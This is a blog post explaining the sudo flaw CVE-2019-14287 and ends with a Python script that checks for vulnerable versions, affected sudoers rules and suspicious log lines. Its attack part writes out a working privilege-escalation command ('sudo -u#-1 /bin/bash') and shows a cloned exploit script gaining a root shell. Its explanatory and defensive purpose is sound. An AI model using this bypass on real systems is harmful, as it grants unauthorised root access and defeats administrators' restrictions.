Sudo Security Bypass
Recently there was a big commotion about sudo, or "superuser do". Apparently there was a flaw in this immensely popular program, which lets Linux users build a more granular security structure on their operating system. Sudo gives the system admin the possibility to hand out permissions and control which user can run which program, and whether they can temporarily act as root or NOT.
With this flaw it is possible for a user to run a program as root even if the sysadmin had restricted this. To use the flaw it is important to remember that the user in question needs to have some sort of sudo permission: if the user has no sudo permission at all, there is no sudo to exploit! Also, the flaw only exists in sudo versions prior to 1.8.28, because in that version the flaw is patched.
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification
test    ALL=(ALL,!root) /bin/bash

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
In the sudoers file there is a rule for the user test: he may run /bin/bash as any user, but the !root in the runas list restricts him from running it as root.
test@cyberspace:~$ sudo /bin/bash
[sudo] password for test:
Sorry, user test is not allowed to execute '/bin/bash' as root on cyberspace.
This is how it normally behaves. The !root restriction in the sudoers file is doing its work.
test@cyberspace:~$ sudo -u#-1 /bin/bash
root@cyberspace:/home/test# id
uid=0(root) gid=1001(test) groups=1001(test)
But by using the flaw, the user test just ran /bin/bash as root, making him root! The trick is the user id -1 (or its unsigned form, 4294967295) given to -u#: it is not root as far as the !root check in sudoers is concerned, so the rule allows the command, but the kernel's setuid call treats -1 as "leave the id unchanged", so the process keeps the uid 0 that sudo already had.
Because I like to do CTFs, I created a small script that checks if the sudo version is vulnerable and exploits the flaw with the given sudo permission.
test@cyberspace:~$ git clone https://github.com/n0w4n/CVE-2019-14287.git
Cloning into 'CVE-2019-14287'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 22 (delta 7), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (22/22), done.
test@cyberspace:~$ cd CVE-2019-14287/
test@cyberspace:~/CVE-2019-14287$ bash sudo.sh
[-] This user has sudo rights
[-] Checking sudo version
[-] This sudo version is vulnerable
[-] Trying to exploit
root@cyberspace:/home/test/CVE-2019-14287# id
uid=0(root) gid=1001(test) groups=1001(test)
The script can be found on my github page: https://github.com/n0w4n/CVE-2019-14287
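For the sysadmin side of the same flaw, here is an added example (written for this page, not the sudo.sh script from the repository above) that does the checks a defender wants before and after patching: it parses the output of `sudo --version` and compares it against the fixed release 1.8.28, scans a sudoers file for rules of the `(ALL,!root)` shape that the bypass defeats, and flags sudo log lines whose runas user is `#-1` or `#4294967295`. The sudoers text and the log lines below are constructed samples modelled on this post; the log format (`USER=#-1` recorded as given on the command line) is an assumption about how a vulnerable sudo logs the request, so confirm it against your own auth log.

```python
import re

# First sudo release that fixes CVE-2019-14287.
PATCHED = (1, 8, 28)

# Constructed sample sudoers content, mirroring the rule shown in the post.
SAMPLE_SUDOERS = """\
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
test ALL=(ALL,!root) /bin/bash
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
"""

# Constructed sample auth-log lines (assumed format: runas user logged as given).
SAMPLE_LOG = """\
Oct 14 21:02:11 cyberspace sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=root ; COMMAND=/bin/bash
Oct 14 21:02:40 cyberspace sudo:     test : TTY=pts/0 ; PWD=/home/test ; USER=#-1 ; COMMAND=/bin/bash
"""


def parse_sudo_version(text):
    """Extract (major, minor, patch) from `sudo --version` output such as
    'Sudo version 1.8.21p2'. The 'pN' suffix does not affect the fix check."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no sudo version string found")
    return tuple(int(x) for x in m.groups())


def version_is_vulnerable(text):
    """True when the installed sudo predates the 1.8.28 fix."""
    return parse_sudo_version(text) < PATCHED


# user  host=(runas_users[:runas_groups])  commands
SUDOERS_RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$")


def affected_rules(sudoers_text):
    """Return (user, runas spec, commands) for every rule whose runas user list
    grants ALL but excludes someone with '!', e.g. (ALL,!root). Those are the
    rules the -u#-1 bypass defeats; plain (ALL:ALL) rules already allow root."""
    found = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUDOERS_RULE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":")[0]
        entries = [e.strip() for e in runas_users.split(",") if e.strip()]
        if "ALL" in entries and any(e.startswith("!") for e in entries):
            found.append((m.group("who"), m.group("runas"), m.group("cmds")))
    return found


# Runas user -1 or its unsigned 32-bit form, as the bypass passes it.
SUSPICIOUS_RUNAS = re.compile(r"USER=#(?:-1|4294967295)\b")


def suspicious_sudo_log_lines(log_text):
    """Return sudo log lines that record the bypass's runas user."""
    return [l for l in log_text.splitlines() if "sudo" in l and SUSPICIOUS_RUNAS.search(l)]


if __name__ == "__main__":
    import subprocess
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
        print("installed sudo vulnerable:", version_is_vulnerable(out))
    except (FileNotFoundError, ValueError):
        print("could not determine installed sudo version")
    for who, runas, cmds in affected_rules(SAMPLE_SUDOERS):
        print(f"rule affected by CVE-2019-14287: {who} ({runas}) {cmds}")
    for hit in suspicious_sudo_log_lines(SAMPLE_LOG):
        print("suspicious sudo invocation:", hit)
```

Run it on a real host by replacing SAMPLE_SUDOERS with the contents of /etc/sudoers (read as root, via `visudo -c` or a copy) and SAMPLE_LOG with your auth log; the version check alone is the quickest way to confirm that the upgrade the post ends with has actually landed.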
Also... don't forget to update your Linux version!!! Happy hacking...